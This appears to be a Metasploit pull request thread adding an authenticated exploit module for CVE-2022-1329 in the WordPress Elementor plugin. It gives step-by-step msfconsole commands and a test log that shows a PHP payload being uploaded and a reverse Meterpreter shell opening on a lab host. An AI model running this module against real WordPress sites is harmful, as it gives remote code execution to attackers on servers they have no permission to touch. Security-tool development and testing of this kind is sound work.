cve-2022-1329 (wordpress elementor plugin)

[h00die]

fixes #16501

This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for Wordpress. Any user account can use this exploit, it was rated a 9.9 CVSS score.

Verification

List the steps needed to make sure this thing works

• Install the plugin, no configuration is required, just hit skip.
• Start msfconsole
• Do: use exploits/multi/http/wp_plugin_elementor_auth_upload_rce
• Do: set username [username]
• Do: set password [password]
• Do: set rhosts [ip]
• Do: run
• You should get a shell.
• check docs

[jheysel-r7]

Thanks @h00die for the great addition. Testing checked out with no issues. Just noticed one potential improvement other than that looks good to go. 🚀

msf6 exploit(multi/http/wp_plugin_elementor_auth_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Looking for nonce
[+] Nonce: 71e2543c26
[*] Uploading upgrade payload and activating...
[*] Payload file name: elementor-pro.php
[*] Sending stage (39927 bytes) to 172.16.199.1
[+] Deleted ../wp-content/plugins/elementor-pro
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:52708) at 2022-10-03 12:39:55 -0400
[+] Payload Uploaded Successfully

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 2dc352e73855
OS          : Linux 2dc352e73855 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >

[h00die]

didn't know about that! converted, re-tested, and left comments in the code for future me to easily convert to the new format. Thanks @jheysel-r7

[jheysel-r7]

Release Notes

This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for Wordpress. Any user account can use this exploit, it was rated a 9.9 CVSS score and was assigned: CVE-2022-1329